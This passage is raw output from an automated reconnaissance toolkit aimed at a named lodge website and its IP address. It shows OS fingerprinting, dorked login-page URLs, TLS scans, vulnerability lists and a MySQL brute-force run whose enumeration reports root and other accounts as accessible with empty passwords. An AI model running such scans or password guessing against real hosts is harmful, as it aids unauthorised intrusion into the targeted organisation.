9881| [3322] mod_php for Apache HTTP Server Process Hijack
9882| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
9883| [2885] Apache mod_python Malformed Query String DoS
9884| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
9885| [2733] Apache HTTP Server mod_rewrite Local Overflow
9886| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
9887| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
9888| [2149] Apache::Gallery Privilege Escalation
9889| [2107] Apache HTTP Server mod_ssl Host: Header XSS
9890| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
9891| [1833] Apache HTTP Server Multiple Slash GET Request DoS
9892| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
9893| [872] Apache Tomcat Multiple Default Accounts
9894| [862] Apache HTTP Server SSI Error Page XSS
9895| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
9896| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
9897| [845] Apache Tomcat MSDOS Device XSS
9898| [844] Apache Tomcat Java Servlet Error Page XSS
9899| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
9900| [838] Apache HTTP Server Chunked Encoding Remote Overflow
9901| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
9902| [775] Apache mod_python Module Importing Privilege Function Execution
9903| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
9904| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
9905| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
9906| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
9907| [637] Apache HTTP Server UserDir Directive Username Enumeration
9908| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
9909| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
9910| [562] Apache HTTP Server mod_info /server-info Information Disclosure
9911| [561] Apache Web Servers mod_status /server-status Information Disclosure
9912| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
9913| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
9914| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
9915| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
9916| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
9917| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
9918| [376] Apache Tomcat contextAdmin Arbitrary File Access
9919| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
9920| [222] Apache HTTP Server test-cgi Arbitrary File Access
9921| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
9922| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
9923|_
9924Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
9925Device type: general purpose
9926Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (91%)
9927OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:2.6
9928Aggressive OS guesses: Linux 3.10 - 3.12 (91%), Linux 4.4 (91%), Linux 4.9 (91%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.10 (86%), Linux 4.0 (86%), Linux 3.10 - 4.11 (85%), Linux 3.11 - 4.1 (85%), Linux 3.18 (85%), Linux 3.2 - 4.9 (85%)
9929No exact OS matches for host (test conditions non-ideal).
9930Uptime guess: 25.968 days (since Wed Oct 30 10:20:01 2019)
9931Network Distance: 17 hops
9932TCP Sequence Prediction: Difficulty=257 (Good luck!)
9933IP ID Sequence Generation: All zeros
9934
9935TRACEROUTE (using port 80/tcp)
9936HOP RTT ADDRESS
99371 133.32 ms 10.245.200.1
99382 ...
99393 130.82 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
99404 130.77 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
99415 135.95 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
99426 158.76 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
99437 166.52 ms be2797.ccr41.fra03.atlas.cogentco.com (154.54.58.225)
99448 162.98 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
99459 165.97 ms centurylink.fra03.atlas.cogentco.com (130.117.14.26)
994610 163.92 ms 63-235-41-102.dia.static.qwest.net (63.235.41.102)
994711 252.03 ms cr1-te-0-5-1-0.ft3.savvis.net (204.70.224.158)
994812 261.11 ms 204.70.192.125
994913 247.17 ms cr2-xe-4-0-2.jfk2.savvis.net (206.28.101.9)
995014 250.95 ms msr1-te-0-3-0-0.bos.savvis.net (206.28.97.205)
995115 247.81 ms hr3-xe-8-0.0.bo3.savvis.net (206.28.97.198)
995216 249.01 ms 64.89.38.2
995317 250.59 ms 192.252.144.58
9954
9955NSE: Script Post-scanning.
9956Initiating NSE at 08:33
9957Completed NSE at 08:33, 0.00s elapsed
9958Initiating NSE at 08:33
9959Completed NSE at 08:33, 0.00s elapsed
9960#######################################################################################################################################
9961------------------------------------------------------------------------------------------------------------------------
9962
9963[ ! ] Starting SCANNER INURLBR 2.1 at [25-11-2019 08:33:45]
9964[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
9965It is the end user's responsibility to obey all applicable local, state and federal laws.
9966Developers assume no liability and are not responsible for any misuse or damage caused by this program
9967
9968[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.pglfe.org/output/inurlbr-www.pglfe.org ]
9969[ INFO ][ DORK ]::[ site:www.pglfe.org ]
9970[ INFO ][ SEARCHING ]:: {
9971[ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.kh ]
9972
9973[ INFO ][ SEARCHING ]::
9974-[:::]
9975[ INFO ][ ENGINE ]::[ GOOGLE API ]
9976
9977[ INFO ][ SEARCHING ]::
9978-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
9979[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.no ID: 003917828085772992913:gmoeray5sa8 ]
9980
9981[ INFO ][ SEARCHING ]::
9982-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
9983
9984[ INFO ][ TOTAL FOUND VALUES ]:: [ 20 ]
9985
9986
9987 _[ - ]::--------------------------------------------------------------------------------------------------------------
9988|_[ + ] [ 0 / 20 ]-[08:34:03] [ - ]
9989|_[ + ] Target:: [ http://www.pglfe.org/stdavid903.php ]
9990|_[ + ] Exploit::
9991|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
9992|_[ + ] More details:: / - / , ISP:
9993|_[ + ] Found:: UNIDENTIFIED
9994
9995 _[ - ]::--------------------------------------------------------------------------------------------------------------
9996|_[ + ] [ 1 / 20 ]-[08:34:05] [ - ]
9997|_[ + ] Target:: [ http://www.pglfe.org/erin463.php ]
9998|_[ + ] Exploit::
9999|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10000|_[ + ] More details:: / - / , ISP:
10001|_[ + ] Found:: UNIDENTIFIED
10002
10003 _[ - ]::--------------------------------------------------------------------------------------------------------------
10004|_[ + ] [ 2 / 20 ]-[08:34:07] [ - ]
10005|_[ + ] Target:: [ http://www.pglfe.org/bauhiniarac322.php ]
10006|_[ + ] Exploit::
10007|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10008|_[ + ] More details:: / - / , ISP:
10009|_[ + ] Found:: UNIDENTIFIED
10010
10011 _[ - ]::--------------------------------------------------------------------------------------------------------------
10012|_[ + ] [ 3 / 20 ]-[08:34:09] [ - ]
10013|_[ + ] Target:: [ http://www.pglfe.org/shamrock712.php ]
10014|_[ + ] Exploit::
10015|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10016|_[ + ] More details:: / - / , ISP:
10017|_[ + ] Found:: UNIDENTIFIED
10018
10019 _[ - ]::--------------------------------------------------------------------------------------------------------------
10020|_[ + ] [ 4 / 20 ]-[08:34:11] [ - ]
10021|_[ + ] Target:: [ http://www.pglfe.org/sinolusitano897.php ]
10022|_[ + ] Exploit::
10023|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10024|_[ + ] More details:: / - / , ISP:
10025|_[ + ] Found:: UNIDENTIFIED
10026
10027 _[ - ]::--------------------------------------------------------------------------------------------------------------
10028|_[ + ] [ 5 / 20 ]-[08:34:13] [ - ]
10029|_[ + ] Target:: [ http://www.pglfe.org/installedmasters1001.php ]
10030|_[ + ] Exploit::
10031|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10032|_[ + ] More details:: / - / , ISP:
10033|_[ + ] Found:: UNIDENTIFIED
10034
10035 _[ - ]::--------------------------------------------------------------------------------------------------------------
10036|_[ + ] [ 6 / 20 ]-[08:34:15] [ - ]
10037|_[ + ] Target:: [ http://www.pglfe.org/emerald883.php ]
10038|_[ + ] Exploit::
10039|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10040|_[ + ] More details:: / - / , ISP:
10041|_[ + ] Found:: UNIDENTIFIED
10042
10043 _[ - ]::--------------------------------------------------------------------------------------------------------------
10044|_[ + ] [ 7 / 20 ]-[08:34:17] [ - ]
10045|_[ + ] Target:: [ http://www.pglfe.org/pglfe_lodges.php ]
10046|_[ + ] Exploit::
10047|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10048|_[ + ] More details:: / - / , ISP:
10049|_[ + ] Found:: UNIDENTIFIED
10050
10051 _[ - ]::--------------------------------------------------------------------------------------------------------------
10052|_[ + ] [ 8 / 20 ]-[08:34:19] [ - ]
10053|_[ + ] Target:: [ http://www.pglfe.org/hamiltonkm67.php ]
10054|_[ + ] Exploit::
10055|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10056|_[ + ] More details:: / - / , ISP:
10057|_[ + ] Found:: UNIDENTIFIED
10058
10059 _[ - ]::--------------------------------------------------------------------------------------------------------------
10060|_[ + ] [ 9 / 20 ]-[08:34:21] [ - ]
10061|_[ + ] Target:: [ http://www.pglfe.org/badenpowell929.php ]
10062|_[ + ] Exploit::
10063|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10064|_[ + ] More details:: / - / , ISP:
10065|_[ + ] Found:: UNIDENTIFIED
10066
10067 _[ - ]::--------------------------------------------------------------------------------------------------------------
10068|_[ + ] [ 10 / 20 ]-[08:34:22] [ - ]
10069|_[ + ] Target:: [ http://www.pglfe.org/pglfe_chapter_km.php ]
10070|_[ + ] Exploit::
10071|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10072|_[ + ] More details:: / - / , ISP:
10073|_[ + ] Found:: UNIDENTIFIED
10074
10075 _[ - ]::--------------------------------------------------------------------------------------------------------------
10076|_[ + ] [ 11 / 20 ]-[08:34:24] [ - ]
10077|_[ + ] Target:: [ http://www.pglfe.org/badenpowellrac929.php ]
10078|_[ + ] Exploit::
10079|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10080|_[ + ] More details:: / - / , ISP:
10081|_[ + ] Found:: UNIDENTIFIED
10082
10083 _[ - ]::--------------------------------------------------------------------------------------------------------------
10084|_[ + ] [ 12 / 20 ]-[08:34:26] [ - ]
10085|_[ + ] Target:: [ http://www.pglfe.org/contact.php ]
10086|_[ + ] Exploit::
10087|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10088|_[ + ] More details:: / - / , ISP:
10089|_[ + ] Found:: UNIDENTIFIED
10090
10091 _[ - ]::--------------------------------------------------------------------------------------------------------------
10092|_[ + ] [ 13 / 20 ]-[08:34:28] [ - ]
10093|_[ + ] Target:: [ http://www.pglfe.org/pglfe-officers.php ]
10094|_[ + ] Exploit::
10095|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10096|_[ + ] More details:: / - / , ISP:
10097|_[ + ] Found:: UNIDENTIFIED
10098
10099 _[ - ]::--------------------------------------------------------------------------------------------------------------
10100|_[ + ] [ 14 / 20 ]-[08:34:29] [ - ]
10101|_[ + ] Target:: [ http://www.pglfe.org/dgracfe_doc/doc_login.php ]
10102|_[ + ] Exploit::
10103|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10104|_[ + ] More details:: / - / , ISP:
10105|_[ + ] Found:: UNIDENTIFIED
10106
10107 _[ - ]::--------------------------------------------------------------------------------------------------------------
10108|_[ + ] [ 15 / 20 ]-[08:34:31] [ - ]
10109|_[ + ] Target:: [ http://www.pglfe.org/pglfe_doc/doc_login.php ]
10110|_[ + ] Exploit::
10111|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10112|_[ + ] More details:: / - / , ISP:
10113|_[ + ] Found:: UNIDENTIFIED
10114
10115 _[ - ]::--------------------------------------------------------------------------------------------------------------
10116|_[ + ] [ 16 / 20 ]-[08:34:33] [ - ]
10117|_[ + ] Target:: [ http://www.pglfe.org/pglfe_sec/secretary_login.php ]
10118|_[ + ] Exploit::
10119|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10120|_[ + ] More details:: / - / , ISP:
10121|_[ + ] Found:: UNIDENTIFIED
10122
10123 _[ - ]::--------------------------------------------------------------------------------------------------------------
10124|_[ + ] [ 17 / 20 ]-[08:34:35] [ - ]
10125|_[ + ] Target:: [ http://www.pglfe.org/pglfe_officers/officer_login.php ]
10126|_[ + ] Exploit::
10127|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10128|_[ + ] More details:: / - / , ISP:
10129|_[ + ] Found:: UNIDENTIFIED
10130
10131 _[ - ]::--------------------------------------------------------------------------------------------------------------
10132|_[ + ] [ 18 / 20 ]-[08:34:36] [ - ]
10133|_[ + ] Target:: [ http://www.pglfe.org/pglfe_calendar2019.php ]
10134|_[ + ] Exploit::
10135|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10136|_[ + ] More details:: / - / , ISP:
10137|_[ + ] Found:: UNIDENTIFIED
10138
10139 _[ - ]::--------------------------------------------------------------------------------------------------------------
10140|_[ + ] [ 19 / 20 ]-[08:34:38] [ - ]
10141|_[ + ] Target:: [ http://www.pglfe.org/gli_officers_hk.php ]
10142|_[ + ] Exploit::
10143|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.144.58:80
10144|_[ + ] More details:: / - / , ISP:
10145|_[ + ] Found:: UNIDENTIFIED
10146
10147[ INFO ] [ Shutting down ]
10148[ INFO ] [ End of process INURLBR at [25-11-2019 08:34:38]
10149[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
10150[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.pglfe.org/output/inurlbr-www.pglfe.org ]
10151|_________________________________________________________________________________________
10152
10153\_________________________________________________________________________________________/
10154######################################################################################################################################
10155https://www.pglfe.org [200 OK] Apache, Cookies[pglfesesid], Country[UNITED STATES][US], HTTPServer[Apache], IP[192.252.144.58], JQuery, Script[text/javascript], maybe Sophos-Email-Appliance, Title[Provincial Grand Lodge of the Far East], UncommonHeaders[upgrade]
10156######################################################################################################################################
10157Version: 1.11.13-static
10158OpenSSL 1.0.2-chacha (1.0.2g-dev)
10159
10160Connected to 192.252.144.58
10161
10162Testing SSL server www.pglfe.org on port 443 using SNI name www.pglfe.org
10163
10164 TLS Fallback SCSV:
10165Server supports TLS Fallback SCSV
10166
10167 TLS renegotiation:
10168Session renegotiation not supported
10169
10170 TLS Compression:
10171Compression disabled
10172
10173 Heartbleed:
10174TLS 1.2 not vulnerable to heartbleed
10175TLS 1.1 not vulnerable to heartbleed
10176TLS 1.0 not vulnerable to heartbleed
10177
10178 Supported Server Cipher(s):
10179Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
10180Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
10181Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
10182Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
10183Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
10184Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
10185Accepted TLSv1.2 256 bits AES256-GCM-SHA384
10186Accepted TLSv1.2 256 bits AES256-SHA256
10187Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
10188Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
10189Accepted TLSv1.2 128 bits AES128-GCM-SHA256
10190Accepted TLSv1.2 128 bits AES128-SHA256
10191Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
10192Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
10193Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
10194Accepted TLSv1.2 256 bits AES256-SHA
10195Accepted TLSv1.2 256 bits CAMELLIA256-SHA
10196Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
10197Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
10198Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
10199Accepted TLSv1.2 128 bits AES128-SHA
10200Accepted TLSv1.2 128 bits CAMELLIA128-SHA
10201
10202 SSL Certificate:
10203Signature Algorithm: sha256WithRSAEncryption
10204RSA Key Strength: 2048
10205
10206Subject: www.server279.com
10207Altnames: DNS:server279.com, DNS:www.server279.com
10208Issuer: Let's Encrypt Authority X3
10209
10210Not valid before: Sep 22 05:35:52 2019 GMT
10211Not valid after: Dec 21 05:35:52 2019 GMT
10406#######################################################################################################################################
tee: /usr/share/sniper/loot/workspace/www.pglfe.org/output/nmap-www.pglfe.org-port3306.txt: Aucun fichier ou dossier de ce type
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:37 EST
Nmap scan report for www.pglfe.org (192.252.144.58)
Host is up (0.25s latency).

PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.7.23-percona-sure1-log
| mysql-brute:
| Accounts: No valid accounts found
| Statistics: Performed 188 guesses in 173 seconds, average tps: 1.2
|_ ERROR: The service seems to have failed or is heavily firewalled...
| mysql-enum:
| Valid usernames:
| root:<empty> - Valid credentials
| web:<empty> - Valid credentials
| netadmin:<empty> - Valid credentials
| guest:<empty> - Valid credentials
| user:<empty> - Valid credentials
| sysadmin:<empty> - Valid credentials
| administrator:<empty> - Valid credentials
| webadmin:<empty> - Valid credentials
| admin:<empty> - Valid credentials
| test:<empty> - Valid credentials
|_ Statistics: Performed 10 guesses in 2 seconds, average tps: 5.0
| mysql-info:
| Protocol: 10
| Version: 5.7.23-percona-sure1-log
| Thread ID: 5789630
| Capabilities flags: 65535
| Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, FoundRows, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, LongPassword, SupportsTransactions, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, InteractiveClient, ODBCClient, SupportsLoadDataLocal, SwitchToSSLAfterHandshake, SupportsCompression, ConnectWithDatabase, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: NI\x13nNN\x12\x01k\x1B\x18\x04/[\x1C%q6Vt
|_ Auth Plugin Name: mysql_native_password
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
| vulners:
| MySQL 5.7.23-percona-sure1-log:
|_ NODEJS:602 0.0 https://vulners.com/nodejs/NODEJS:602
| vulscan: VulDB - https://vuldb.com:
| [138071] Oracle MySQL Server up to 5.7.23 Replication unknown vulnerability
| [125567] Oracle MySQL Server up to 5.7.23/8.0.12 Logging denial of service
| [125566] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
| [125561] Oracle MySQL Server up to 5.7.23/8.0.12 Partition denial of service
| [125555] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
| [125554] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
| [125553] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
| [125552] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
| [125551] Oracle MySQL Server up to 5.7.23/8.0.12 Partition denial of service
| [125549] Oracle MySQL Server up to 5.7.23/8.0.12 Optimizer denial of service
| [125546] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
| [125545] Oracle MySQL Server up to 5.7.23/8.0.12 Audit denial of service
| [125536] Oracle MySQL Server up to 5.7.23/8.0.12 Parser denial of service
| [138098] Oracle MySQL Server up to 5.7.26/8.0.16 Audit Plug-in unknown vulnerability
| [138097] Oracle MySQL Server up to 5.7.26/8.0.16 Client programs denial of service
| [138094] Oracle MySQL Server up to 5.7.25/8.0.15 Replication denial of service
| [138085] Oracle MySQL Server up to 5.7.26/8.0.16 Optimizer denial of service
| [138084] Oracle MySQL Server up to 5.7.26/8.0.16 Optimizer denial of service
| [138073] Oracle MySQL Server up to 5.7.26/8.0.16 Audit Log denial of service
| [138072] Oracle MySQL Server up to 5.7.26/8.0.16 Privileges unknown vulnerability
| [138069] Oracle MySQL Server up to 5.7.26/8.0.16 InnoDB unknown vulnerability
| [138058] Oracle MySQL Server up to 5.7.26/8.0.15 cURL unknown vulnerability
| [129647] Oracle MySQL Server up to 5.7.24/8.0.13 Privileges denial of service
| [129646] Oracle MySQL Server up to 5.7.24/8.0.13 Privileges denial of service
| [129644] Oracle MySQL Server up to 5.7.24/8.0.13 Partition denial of service
| [129640] Oracle MySQL Server up to 5.7.24/8.0.13 Optimizer denial of service
| [129635] Oracle MySQL Server up to 5.7.24/8.0.13 InnoDB denial of service
| [129628] Oracle MySQL Server up to 5.7.24/8.0.13 Parser denial of service
| [121797] Oracle MySQL Server up to 5.7.22/8.0.11 Privileges unknown vulnerability
| [121792] Oracle MySQL Server up to 5.7.22 DML denial of service
| [121789] Oracle MySQL Server up to 5.7.22/8.0.11 DDL denial of service
| [121788] Oracle MySQL Server up to 5.7.22/8.0.11 DDL denial of service
| [121786] Oracle MySQL Server up to 5.7.22 Audit Log denial of service
| [121779] Oracle MySQL Server up to 5.7.22/8.0.11 DML denial of service
| [121778] Oracle MySQL Server up to 5.7.22/8.0.11 InnoDB denial of service
| [116759] Oracle MySQL Server up to 5.7.21 Group Replication GCS denial of service
| [116758] Oracle MySQL Server up to 5.7.21 Pluggable Auth denial of service
| [116757] Oracle MySQL Server up to 5.7.21 Performance Schema denial of service
| [116756] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
| [116754] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
| [116753] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
| [116752] Oracle MySQL Server up to 5.7.21 DML denial of service
| [116750] Oracle MySQL Server up to 5.7.21 InnoDB denial of service
| [116749] Oracle MySQL Server up to 5.7.21 InnoDB denial of service
| [116747] Oracle MySQL Server up to 5.7.21 InnoDB denial of service
| [116745] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
| [116743] Oracle MySQL Server up to 5.7.21 InnoDB denial of service
| [116740] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
| [116739] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
| [112110] Oracle MySQL Server up to 5.7.20 Optimizer denial of service
| [112109] Oracle MySQL Server up to 5.7.20 Optimizer denial of service
| [112108] Oracle MySQL Server up to 5.7.20 InnoDB denial of service
| [112107] Oracle MySQL Server up to 5.7.20 DML denial of service
| [112106] Oracle MySQL Server up to 5.7.20 DML denial of service
| [112105] Oracle MySQL Server up to 5.7.20 DML denial of service
| [75159] Oracle MySQL up to 5.7.2 SSL Client weak encryption
|
| MITRE CVE - https://cve.mitre.org:
| [CVE-2013-3812] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Replication.
| [CVE-2013-3811] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB, a different vulnerability than CVE-2013-3806.
| [CVE-2013-3810] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to XA Transactions.
| [CVE-2013-3809] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Audit Log.
| [CVE-2013-3808] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Options.
| [CVE-2013-3807] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote attackers to affect confidentiality and integrity via unknown vectors related to Server Privileges.
| [CVE-2013-3806] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB, a different vulnerability than CVE-2013-3811.
| [CVE-2013-3805] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Prepared Statements.
| [CVE-2013-3804] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
| [CVE-2013-3802] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Full Text Search.
| [CVE-2013-3801] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Options.
| [CVE-2013-3798] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote attackers to affect integrity and availability via unknown vectors related to MemCached.
| [CVE-2013-3796] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
| [CVE-2013-3795] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
| [CVE-2013-3794] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Partition.
| [CVE-2013-3793] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
| [CVE-2013-3783] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Parser.
| [CVE-2013-2395] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language, a different vulnerability than CVE-2013-1567.
| [CVE-2013-2392] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
| [CVE-2013-2391] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows local users to affect confidentiality and integrity via unknown vectors related to Server Install.
| [CVE-2013-2389] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
| [CVE-2013-2381] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server Privileges.
| [CVE-2013-2378] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Information Schema.
| [CVE-2013-2376] Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Stored Procedure.
| [CVE-2013-2375] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
| [CVE-2013-1861] MariaDB 5.5.x before 5.5.30, 5.3.x before 5.3.13, 5.2.x before 5.2.15, and 5.1.x before 5.1.68, and Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote attackers to cause a denial of service (crash) via a crafted geometry feature that specifies a large number of points, which is not properly handled when processing the binary representation of this feature, related to a numeric calculation error.
| [CVE-2013-1570] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote attackers to affect availability via unknown vectors related to MemCached.
